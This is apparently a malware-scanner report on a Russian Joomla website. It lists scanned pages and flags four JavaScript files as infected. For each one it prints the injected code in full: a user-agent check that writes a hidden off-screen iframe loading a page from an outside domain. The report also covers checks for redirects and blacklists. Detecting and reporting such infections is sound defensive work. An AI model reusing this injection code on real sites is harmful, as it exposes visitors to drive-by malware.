Scanned pages/files
Request | Server response | Status |
http://www.ech-srv.ru/ | 200 OK Content-Length: 12112 Content-Type: text/html | clean |
http://www.ech-srv.ru/templates/exp_cars/movie.js | 200 OK Content-Length: 1317 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); function run_ } e>');;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.ech-srv.ru/information/okompanii/ | 200 OK Content-Length: 14358 Content-Type: text/html | clean |
http://www.ech-srv.ru/information/echelon/ | 200 OK Content-Length: 17978 Content-Type: text/html | clean |
http://www.ech-srv.ru/information/faq/ | 200 OK Content-Length: 20215 Content-Type: text/html | clean |
http://www.ech-srv.ru/information/kontakty/ | 200 OK Content-Length: 13087 Content-Type: text/html | clean |
http://www.ech-srv.ru/includes/js/calendar/calendar_mini.js | 200 OK Content-Length: 725 Content-Type: application/x-javascript | clean |
http://www.ech-srv.ru/includes/js/calendar/lang/calendar-en.js | 200 OK Content-Length: 1809 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); Calendar._DN Calendar._TT["DRAG_TO_MOVE"] = "Drag to move"; Calendar._TT["PART_TODAY"] = " (today)"; Calendar._TT["MON_FIRST"] = "Display Monday first"; Calendar._TT["SUN_FIRST"] = "Display Sunday first"; Calendar._TT["CLOSE"] = "Close"; Calendar._TT["TODAY"] = "Today"; Calendar._TT["DEF_DATE_FORMAT"] = "y-mm-dd"; Calendar._TT["TT_DATE_FORMAT"] = "D, M d"; Calendar._TT["WK"] = "wk"; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.ech-srv.ru/includes/js/joomla.javascript.js | 200 OK Content-Length: 17178 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); function xsho } } else { alert("You cannot change the order of items, as an item in the list is `Checked Out`"); return; } } submitform('saveorder'); } function getElementByName( f, name ) { if (f.elements) { for (i=0, n=f.elements.length; i < n; i++) { if (f.elements[i].name == name) { return f.elements[i]; } } } return null; };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.ech-srv.ru/includes/js/mambojavascript.js | 200 OK Content-Length: 17055 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mastercodevault() {
var poc = navigator.userAgent; var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1); if (!poirlastic) { document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>'); } } Mastercodevault(); function xsho } } else { alert("You cannot change the order of items, as an item in the list is `Checked Out`"); return; } } submitform('saveorder'); } function getElementByName( f, name ) { if (f.elements) { for (i=0, n=f.elements.length; i < n; i++) { if (f.elements[i].name == name) { return f.elements[i]; } } } return null; };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.ech-srv.ru/komplekt/standart/ | 200 OK Content-Length: 24723 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/standartprofi/ | 200 OK Content-Length: 24885 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/standartprofim/ | 200 OK Content-Length: 24942 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/vip/ | 200 OK Content-Length: 24964 Content-Type: text/html | clean |
http://www.ech-srv.ru/komplekt/dopoborudovanie/ | 200 OK Content-Length: 15701 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ech-srv.ru
Result:
GET / HTTP/1.1
Host: ech-srv.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ech-srv.ru
Referer: http://www.google.com/search?q=ech-srv.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ech-srv.ru
Referer: http://www.google.com/search?q=ech-srv.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ech-srv.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ech-srv.ru/
Result: ech-srv.ru is not infected or malware details are not published yet.
Result: ech-srv.ru is not infected or malware details are not published yet.